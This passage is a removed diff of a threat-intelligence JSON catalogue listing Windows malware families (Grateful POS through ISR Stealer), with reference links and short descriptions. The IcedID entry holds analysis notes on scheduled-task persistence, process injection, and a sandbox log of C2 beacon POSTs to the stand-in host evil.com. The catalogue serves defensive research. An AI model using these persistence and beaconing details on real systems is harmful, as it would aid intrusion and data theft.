"https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" - ] - }, - "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", - "value": "Grateful POS", - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] - }, - "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", - "value": "Gratem", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", - "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", - "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" - ] - }, - "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", - "value": "Gravity RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "eoehttp" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", - "https://blog.cylance.com/spear-a-threat-actor-resurfaces" - ] - }, - "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", - "value": "GreenShaitan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", - "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] - }, - "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", - "value": "GROK", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", - "https://attack.mitre.org/wiki/Technique/T1003" - ] - }, - "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", - "value": "gsecdump", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", - "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" - ] - }, - "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", - "value": "H1N1 Loader", - "description": "" - }, - { - 
"meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", - "value": "Hacksfase", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", - "https://github.com/ratty3697/HackSpy-Trojan-Exploit" - ] - }, - "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", - "value": "HackSpy", - "description": "Py2Exe based tool as found on github." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", - "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" - ] - }, - "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", - "value": "Hamweq", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Chanitor" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", - "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", - "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", - "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", - 
"https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak" - ] - }, - "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", - "value": "Hancitor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" - ] - }, - "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", - "value": "HappyLocker (HiddenTear?)", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Piptea" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", - "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", - "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" - ] - }, - "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", - "value": "Harnig", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", - "https://www.f-secure.com/weblog/archives/00002718.html" - ] - }, - "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", - "value": "Havex RAT", - "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. 
Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries." 
- }, - { - "meta": { - "synonyms": [ - "Predator Pain" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", - "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", - "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", - "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/", - "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/" - ] - }, - "uuid": "31615066-dbff-4134-b467-d97a337b408b", - "value": "HawkEye Keylogger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", - "value": "Helauto", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", - "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", - "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" - ] - }, - "uuid": "19d89300-ff97-4281-ac42-76542e744092", - "value": "Helminth", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", - "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", - "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" - ] - }, - "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", - "value": "Heloag", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", - "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" - ] - }, - "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", - "value": "Herbst", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - }, - "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", - "value": "Heriplor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] - }, - "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", - "value": "Hermes", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] - }, - "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", - "value": "Hermes Ransomware", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" - ] - }, - "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", - "value": "HerpesBot", - 
"description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" - ] - }, - "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", - "value": "HesperBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", - "https://github.com/goliate/hidden-tear", - "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", - "https://twitter.com/struppigel/status/950787783353884672" - ] - }, - "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", - "value": "HiddenTear", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" - ] - }, - "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", - "value": "HideDRV", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", - "https://www.recordedfuture.com/hidden-lynx-analysis/", - "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" - ] - }, - "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", - "value": "HiKit", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", - "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" - ] - }, - "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", - "value": "himan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", - "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" - ] - }, - "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", - "value": "Hi-Zor RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" - ] - }, - "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", - "value": "HLUX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - }, - "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", - "value": "homefry", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" - ] - }, - "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", - "value": "HtBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", - "https://www.riskiq.com/blog/labs/htprat/" - ] - }, - "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", - "value": "htpRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "HUC Packet Transmit Tool" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", - "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", - "https://www.secureworks.com/research/htran" - ] - }, - "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", - "value": "HTran", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", - "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" - 
] - }, - "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", - "value": "HttpBrowser", - "description": "" - }, - { - "meta": { - "synonyms": [ - "httpdr0pper" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", - "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", - "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787" - ] - }, - "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", - "value": "httpdropper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", - "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", - "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" - ] - }, - "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", - "value": "http_troy", - "description": "" - }, - { - "meta": { - "synonyms": [ - "houdini" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" - ] - }, - "uuid": "94466a80-964f-467e-b4b3-0e1375174464", - "value": "Hworm", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", - "https://securelist.com/luckymouse-hits-national-data-center/86083/" - ] - }, - "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", - "value": "HyperBro", - "description": "" - }, - { - "meta": { - "synonyms": [ - "BokBot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", - 
"https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", - "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", - "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", - "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" - ] - }, - "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", - "value": "IcedID", - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. 
waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 
12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", - "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/" - ] - }, - "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", - "value": "IcedID Downloader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", - "http://www.kz-cert.kz/page/502" - ] - }, - "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", - "value": "Icefog", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", - "https://securelist.com/ice-ix-not-cool-at-all/29111/", - 
"https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus", - "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/" - ] - }, - "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", - "value": "Ice IX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", - "https://isc.sans.edu/diary/22766" - ] - }, - "uuid": "3afecded-3461-45f9-8159-e8328e56a916", - "value": "IDKEY", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" - ] - }, - "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", - "value": "IISniff", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", - "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" - ] - }, - "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", - "value": "Imecab", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", - "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" - ] - }, - "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", - "value": "Imminent Monitor RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Foudre" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", - "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", - "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", - "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", - 
"https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" - ] - }, - "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", - "value": "Infy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", - "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" - ] - }, - "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", - "value": "InnaputRAT", - "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", - "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" - ] - }, - "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", - "value": "InvisiMole", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Gozi ISFB", - "IAP", - "Pandemyia" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", - "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", - "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", - "https://lokalhost.pl/gozi_tree.txt", - "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", - "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", - "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", - 
"http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", - "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", - "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", - "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", - "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", - "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/" - ] - }, - "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", - "value": "ISFB", - "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. 
The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", - "http://www.clearskysec.com/ismagent/" - ] - }, - "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", - "value": "ISMAgent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", - "http://www.clearskysec.com/greenbug/" - ] - }, - "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", - "value": "ISMDoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", - "https://www.zscaler.com/blogs/research/ispy-keylogger" - ] - }, - "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", - "value": "iSpy Keylogger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", - "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" - ] - }, - "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", - "value": "ISR Stealer", - "description": "ISR Stealer is a modified version of the Hackhound Stealer. 
